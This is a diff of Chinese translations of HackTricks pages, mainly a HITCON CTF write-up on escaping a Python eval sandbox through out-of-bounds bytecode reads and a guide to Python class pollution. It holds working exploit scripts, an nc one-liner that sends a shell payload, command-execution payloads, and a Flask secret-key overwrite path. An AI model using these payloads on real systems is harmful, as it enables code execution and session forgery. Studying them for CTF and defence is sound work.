学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,45 +1,42 @@
|
|||
# LOAD_NAME / LOAD_CONST opcode OOB 读取
|
||||
# LOAD_NAME / LOAD_CONST opcode OOB Read
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** 上关注我们**。
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**此信息来源于** [**此篇文章**](https://blog.splitline.tw/hitcon-ctf-2022/)**。**
|
||||
|
||||
### TL;DR <a href="#tldr-2" id="tldr-2"></a>
|
||||
|
||||
我们可以利用 LOAD_NAME / LOAD_CONST 操作码中的 OOB 读取功能来获取内存中的某些符号。这意味着可以使用类似 `(a, b, c, ... 数百个符号 ..., __getattribute__) if [] else [].__getattribute__(...)` 的技巧来获取您想要的符号(如函数名)。
|
||||
我们可以利用 LOAD_NAME / LOAD_CONST 操作码中的 OOB 读取功能来获取内存中的某些符号。这意味着可以使用类似 `(a, b, c, ... 数百个符号 ..., __getattribute__) if [] else [].__getattribute__(...)` 的技巧来获取所需的符号(如函数名)。
|
||||
|
||||
然后只需精心制作您的利用程序。
|
||||
|
||||
### 概述 <a href="#overview-1" id="overview-1"></a>
|
||||
|
||||
源代码非常简短,仅包含 4 行!
|
||||
源代码非常简短,只包含 4 行!
|
||||
```python
|
||||
source = input('>>> ')
|
||||
if len(source) > 13337: exit(print(f"{'L':O<13337}NG"))
|
||||
code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=())
|
||||
print(eval(code, {'__builtins__': {}}))1234
|
||||
```
|
||||
您可以输入任意Python代码,它将被编译为[Python代码对象](https://docs.python.org/3/c-api/code.html)。但是在评估该代码对象之前,该代码对象的`co_consts`和`co_names`将被替换为一个空元组。
|
||||
|
||||
因此,在这种情况下,所有包含常量(例如数字、字符串等)或名称(例如变量、函数)的表达式最终可能导致段错误。
|
||||
|
||||
### 越界读取 <a href="#out-of-bound-read" id="out-of-bound-read"></a>
|
||||
|
||||
段错误是如何发生的?
|
||||
|
||||
让我们从一个简单的例子开始,`[a, b, c]`可以编译成以下字节码。
|
||||
让我们从一个简单的例子开始,`[a, b, c]` 可以编译成以下字节码。
|
||||
```
|
||||
1 0 LOAD_NAME 0 (a)
|
||||
2 LOAD_NAME 1 (b)
|
||||
|
@ -47,11 +44,11 @@ print(eval(code, {'__builtins__': {}}))1234
|
|||
6 BUILD_LIST 3
|
||||
8 RETURN_VALUE12345
|
||||
```
|
||||
但如果`co_names`变成空元组会怎么样?`LOAD_NAME 2`操作码仍然会被执行,并尝试从原本应该在的内存地址读取值。是的,这是一种越界读取的“特性”。
|
||||
但是如果 `co_names` 变成空元组会怎么样呢?`LOAD_NAME 2` 操作码仍然会被执行,并尝试从原本应该在的内存地址读取值。是的,这是一种越界读取的“特性”。
|
||||
|
||||
解决方案的核心概念很简单。CPython中的一些操作码,例如`LOAD_NAME`和`LOAD_CONST`,对越界读取存在漏洞。
|
||||
解决方案的核心概念很简单。CPython 中的一些操作码,例如 `LOAD_NAME` 和 `LOAD_CONST`,对越界读取存在漏洞。
|
||||
|
||||
它们从`consts`或`names`元组中的索引`oparg`中检索对象(这就是`co_consts`和`co_names`在底层的名称)。我们可以参考关于`LOAD_CONST`的以下简短片段,了解CPython在处理到`LOAD_CONST`操作码时的操作。
|
||||
它们从 `consts` 或 `names` 元组中的索引 `oparg` 检索对象(这就是 `co_consts` 和 `co_names` 在底层的命名方式)。我们可以参考关于 `LOAD_CONST` 的以下简短片段,了解 CPython 在处理 `LOAD_CONST` 操作码时的操作。
|
||||
```c
|
||||
case TARGET(LOAD_CONST): {
|
||||
PREDICTED(LOAD_CONST);
|
||||
|
@ -61,21 +58,21 @@ PUSH(value);
|
|||
FAST_DISPATCH();
|
||||
}1234567
|
||||
```
|
||||
通过这种方式,我们可以使用OOB功能从任意内存偏移获取一个“name”。要确保它的名称和偏移量是什么,只需不断尝试`LOAD_NAME 0`,`LOAD_NAME 1` ... `LOAD_NAME 99` ... 您可能会发现大约在oparg > 700时会找到一些内容。当然,您也可以尝试使用gdb查看内存布局,但我认为这样做可能不会更容易?
|
||||
通过这种方式,我们可以使用OOB功能从任意内存偏移获取一个“name”。要确保它的名称和偏移量是什么,只需不断尝试 `LOAD_NAME 0`,`LOAD_NAME 1` ... `LOAD_NAME 99` ... 然后你可能会在 oparg > 700 左右找到一些内容。当然,你也可以尝试使用 gdb 查看内存布局,但我认为这样做可能不会更容易?
|
||||
|
||||
### 生成利用 <a href="#generating-the-exploit" id="generating-the-exploit"></a>
|
||||
|
||||
一旦我们检索到那些有用的名称/常量偏移,我们如何从该偏移获取一个名称/常量并使用它呢?这里有一个技巧:\
|
||||
假设我们可以从偏移5(`LOAD_NAME 5`)中获取一个`__getattribute__`名称,且`co_names=()`,然后只需执行以下操作:
|
||||
一旦我们检索到那些有用的名称/常量的偏移量,我们如何从该偏移量获取一个名称/常量并使用它呢?这里有一个技巧:\
|
||||
假设我们可以从偏移量 5 (`LOAD_NAME 5`) 中获取一个 `__getattribute__` 名称,且 `co_names=()`,然后只需执行以下操作:
|
||||
```python
|
||||
[a,b,c,d,e,__getattribute__] if [] else [
|
||||
[].__getattribute__
|
||||
# you can get the __getattribute__ method of list object now!
|
||||
]1234
|
||||
```
|
||||
> 注意,不必将其命名为`__getattribute__`,您可以将其命名为更短或更奇怪的名称
|
||||
> 请注意,将其命名为`__getattribute__`并非必需,您可以将其命名为更短或更奇怪的名称
|
||||
|
||||
您可以通过查看其字节码来理解其背后的原因:
|
||||
只需查看其字节码,您就可以理解背后的原因:
|
||||
```python
|
||||
0 BUILD_LIST 0
|
||||
2 POP_JUMP_IF_FALSE 20
|
||||
|
@ -105,7 +102,7 @@ FAST_DISPATCH();
|
|||
|
||||
由于长度限制,我没有使用常量。
|
||||
|
||||
首先,这里是一个用于查找这些名称偏移量的脚本。
|
||||
首先,这里是一个脚本,用于找到这些名称的偏移量。
|
||||
```python
|
||||
from types import CodeType
|
||||
from opcode import opmap
|
||||
|
@ -140,7 +137,7 @@ print(f'{n}: {ret}')
|
|||
|
||||
# for i in $(seq 0 10000); do python find.py $i ; done1234567891011121314151617181920212223242526272829303132
|
||||
```
|
||||
以下内容用于生成真正的Python利用。
|
||||
并且以下是用于生成真实的Python利用程序。
|
||||
```python
|
||||
import sys
|
||||
import unicodedata
|
||||
|
@ -217,7 +214,7 @@ print(source)
|
|||
# (python exp.py; echo '__import__("os").system("sh")'; cat -) | nc challenge.server port
|
||||
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273
|
||||
```
|
||||
它基本上执行以下操作,对于我们从`__dir__`方法中获取的字符串:
|
||||
它基本上执行以下操作,对于我们从`__dir__`方法获取的字符串:
|
||||
```python
|
||||
getattr = (None).__getattribute__('__class__').__getattribute__
|
||||
builtins = getattr(
|
||||
|
@ -230,16 +227,17 @@ getattr(
|
|||
'__repr__').__getattribute__('__globals__')['builtins']
|
||||
builtins['eval'](builtins['input']())
|
||||
```
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索我们的独家[**NFTs**]收藏品,[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,23 +1,23 @@
|
|||
# Class Pollution (Python's Prototype Pollution)
|
||||
# 类污染(Python的原型污染)
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 基本示例
|
||||
|
||||
查看如何通过字符串污染对象的类:
|
||||
|
||||
```python
|
||||
class Company: pass
|
||||
class Developer(Company): pass
|
||||
|
@ -41,9 +41,7 @@ e.__class__.__base__.__base__.__qualname__ = 'Polluted_Company'
|
|||
print(d) #<__main__.Polluted_Developer object at 0x1041d2b80>
|
||||
print(c) #<__main__.Polluted_Company object at 0x1043a72b0>
|
||||
```
|
||||
|
||||
## 基本漏洞示例
|
||||
|
||||
```python
|
||||
# Initial state
|
||||
class Employee: pass
|
||||
|
@ -76,41 +74,62 @@ USER_INPUT = {
|
|||
merge(USER_INPUT, emp)
|
||||
print(vars(emp)) #{'name': 'Ahemd', 'age': 23, 'manager': {'name': 'Sarah'}}
|
||||
```
|
||||
|
||||
## 示例
|
||||
## 示例装置
|
||||
|
||||
<details>
|
||||
|
||||
<summary>将类属性默认值设置为RCE(子进程)</summary>
|
||||
<summary>将类属性默认值创建为RCE(子进程)</summary>
|
||||
```python
|
||||
from os import popen
|
||||
class Employee: pass # Creating an empty class
|
||||
class HR(Employee): pass # Class inherits from Employee class
|
||||
class Recruiter(HR): pass # Class inherits from HR class
|
||||
|
||||
\`\`\`python from os import popen class Employee: pass # Creating an empty class class HR(Employee): pass # Class inherits from Employee class class Recruiter(HR): pass # Class inherits from HR class
|
||||
|
||||
class SystemAdmin(Employee): # Class inherits from Employee class def execute\_command(self): command = self.custom\_command if hasattr(self, 'custom\_command') else 'echo Hello there' return f'\[!] Executing: "{command}", output: "{popen(command).read().strip()}"'
|
||||
class SystemAdmin(Employee): # Class inherits from Employee class
|
||||
def execute_command(self):
|
||||
command = self.custom_command if hasattr(self, 'custom_command') else 'echo Hello there'
|
||||
return f'[!] Executing: "{command}", output: "{popen(command).read().strip()}"'
|
||||
|
||||
def merge(src, dst):
|
||||
# Recursive merge function
|
||||
for k, v in src.items():
|
||||
if hasattr(dst, '__getitem__'):
|
||||
if dst.get(k) and type(v) == dict:
|
||||
merge(v, dst.get(k))
|
||||
else:
|
||||
dst[k] = v
|
||||
elif hasattr(dst, k) and type(v) == dict:
|
||||
merge(v, getattr(dst, k))
|
||||
else:
|
||||
setattr(dst, k, v)
|
||||
|
||||
## Recursive merge function
|
||||
USER_INPUT = {
|
||||
"__class__":{
|
||||
"__base__":{
|
||||
"__base__":{
|
||||
"custom_command": "whoami"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
for k, v in src.items(): if hasattr(dst, '**getitem**'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst\[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v)
|
||||
recruiter_emp = Recruiter()
|
||||
system_admin_emp = SystemAdmin()
|
||||
|
||||
USER\_INPUT = { "**class**":{ "**base**":{ "**base**":{ "custom\_command": "whoami" } } } }
|
||||
print(system_admin_emp.execute_command())
|
||||
#> [!] Executing: "echo Hello there", output: "Hello there"
|
||||
|
||||
recruiter\_emp = Recruiter() system\_admin\_emp = SystemAdmin()
|
||||
# Create default value for Employee.custom_command
|
||||
merge(USER_INPUT, recruiter_emp)
|
||||
|
||||
print(system\_admin\_emp.execute\_command()) #> \[!] Executing: "echo Hello there", output: "Hello there"
|
||||
|
||||
## Create default value for Employee.custom\_command
|
||||
|
||||
merge(USER\_INPUT, recruiter\_emp)
|
||||
|
||||
print(system\_admin\_emp.execute\_command()) #> \[!] Executing: "whoami", output: "abdulrah33m"
|
||||
|
||||
````
|
||||
print(system_admin_emp.execute_command())
|
||||
#> [!] Executing: "whoami", output: "abdulrah33m"
|
||||
```
|
||||
</details>
|
||||
|
||||
<details>
|
||||
|
||||
<summary>通过<code>globals</code>污染其他类和全局变量</summary>
|
||||
<summary>通过 <code>globals</code> 污染其他类和全局变量</summary>
|
||||
```python
|
||||
def merge(src, dst):
|
||||
# Recursive merge function
|
||||
|
@ -137,40 +156,46 @@ merge({'__class__':{'__init__':{'__globals__':{'not_accessible_variable':'Pollut
|
|||
|
||||
print(not_accessible_variable) #> Polluted variable
|
||||
print(NotAccessibleClass) #> <class '__main__.PollutedClass'>
|
||||
````
|
||||
|
||||
```
|
||||
</details>
|
||||
|
||||
<details>
|
||||
|
||||
<summary>任意子进程执行</summary>
|
||||
```python
|
||||
import subprocess, json
|
||||
|
||||
\`\`\`python import subprocess, json
|
||||
|
||||
class Employee: def **init**(self): pass
|
||||
class Employee:
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
def merge(src, dst):
|
||||
# Recursive merge function
|
||||
for k, v in src.items():
|
||||
if hasattr(dst, '__getitem__'):
|
||||
if dst.get(k) and type(v) == dict:
|
||||
merge(v, dst.get(k))
|
||||
else:
|
||||
dst[k] = v
|
||||
elif hasattr(dst, k) and type(v) == dict:
|
||||
merge(v, getattr(dst, k))
|
||||
else:
|
||||
setattr(dst, k, v)
|
||||
|
||||
## Recursive merge function
|
||||
# Overwrite env var "COMSPEC" to execute a calc
|
||||
USER_INPUT = json.loads('{"__init__":{"__globals__":{"subprocess":{"os":{"environ":{"COMSPEC":"cmd /c calc"}}}}}}') # attacker-controlled value
|
||||
|
||||
for k, v in src.items(): if hasattr(dst, '**getitem**'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst\[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v)
|
||||
|
||||
## Overwrite env var "COMSPEC" to execute a calc
|
||||
|
||||
USER\_INPUT = json.loads('{"**init**":{"**globals**":{"subprocess":{"os":{"environ":{"COMSPEC":"cmd /c calc"\}}\}}\}}') # attacker-controlled value
|
||||
|
||||
merge(USER\_INPUT, Employee())
|
||||
merge(USER_INPUT, Employee())
|
||||
|
||||
subprocess.Popen('whoami', shell=True) # Calc.exe will pop up
|
||||
|
||||
````
|
||||
```
|
||||
</details>
|
||||
|
||||
<details>
|
||||
|
||||
<summary>覆盖 <strong><code>__kwdefaults__</code></strong></summary>
|
||||
|
||||
**`__kwdefaults__`** 是所有函数的一个特殊属性,根据 Python [文档](https://docs.python.org/3/library/inspect.html) ,它是一个“映射任何**仅关键字**参数的默认值”。污染这个属性允许我们控制函数的仅关键字参数的默认值,这些参数是在 \* 或 \*args 之后出现的函数参数。
|
||||
**`__kwdefaults__`** 是所有函数的一个特殊属性,根据 Python [文档](https://docs.python.org/3/library/inspect.html) ,它是一个“任何**仅限关键字**参数的默认值的映射”。污染这个属性允许我们控制函数的仅限关键字参数的默认值,这些参数是在 \* 或 \*args 之后的函数参数。
|
||||
```python
|
||||
from os import system
|
||||
import json
|
||||
|
@ -206,31 +231,28 @@ merge(emp_info, Employee())
|
|||
print(execute.__kwdefaults__) #> {'command': 'echo Polluted'}
|
||||
execute() #> Executing echo Polluted
|
||||
#> Polluted
|
||||
````
|
||||
|
||||
```
|
||||
</details>
|
||||
|
||||
<details>
|
||||
|
||||
<summary>跨文件覆盖 Flask 密钥</summary>
|
||||
<summary>在不同文件中覆盖 Flask 密钥</summary>
|
||||
|
||||
因此,如果您可以对 Web 的主 Python 文件中定义的对象进行类污染,但**其类是在与主文件不同的文件中定义的**。因为为了访问前面的有效负载中的 \_\_globals\_\_,您需要访问对象的类或类的方法,您将能够**访问该文件中的全局变量,但无法访问主文件中的全局变量**。\
|
||||
因此,如果您可以对 Web 的主 Python 文件中定义的对象进行类污染,但**其类是在与主文件不同的文件中定义的**。因为为了访问前面的有效负载中的 \_\_globals\_\_,您需要访问对象的类或类的方法,您将能够**访问该文件中的全局变量,但无法访问主文件中的全局变量**。 \
|
||||
因此,您**将无法访问在主页中定义了密钥的 Flask 应用全局对象**:
|
||||
|
||||
```python
|
||||
app = Flask(__name__, template_folder='templates')
|
||||
app.secret_key = '(:secret:)'
|
||||
```
|
||||
在这种情况下,您需要一个小工具来遍历文件以找到主文件,以**访问全局对象 `app.secret_key`**,从而更改 Flask 密钥并能够[**通过了解此密钥来提升权限**](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign)。
|
||||
|
||||
在这种情况下,您需要一个小工具来遍历文件以访问全局对象 `app.secret_key`,从而更改Flask密钥并能够[**通过了解此密钥来提升权限**](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign)。
|
||||
|
||||
像这样的有效负载[来自此解决方案](https://ctftime.org/writeup/36082):
|
||||
|
||||
像这样的有效负载[来自这篇解说](https://ctftime.org/writeup/36082):
|
||||
```python
|
||||
__init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.secret_key
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
使用此有效载荷来**更改 `app.secret_key`**(您的应用中的名称可能不同),以便能够签署新的和更多特权的 flask cookies。
|
||||
使用此有效负载来**更改 `app.secret_key`**(您的应用程序中的名称可能不同),以便能够签署新的和更多特权的 flask cookies。
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -244,16 +266,17 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se
|
|||
|
||||
* [https://blog.abdulrah33m.com/prototype-pollution-in-python/](https://blog.abdulrah33m.com/prototype-pollution-in-python/)
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技能:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技能:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* 上关注我们\*\*。
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,24 +1,25 @@
|
|||
# Pyscript
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## PyScript渗透测试指南
|
||||
## PyScript 渗透测试指南
|
||||
|
||||
PyScript是一个新的框架,用于将Python集成到HTML中,以便与HTML一起使用。在这份速查表中,您将了解如何使用PyScript进行渗透测试。
|
||||
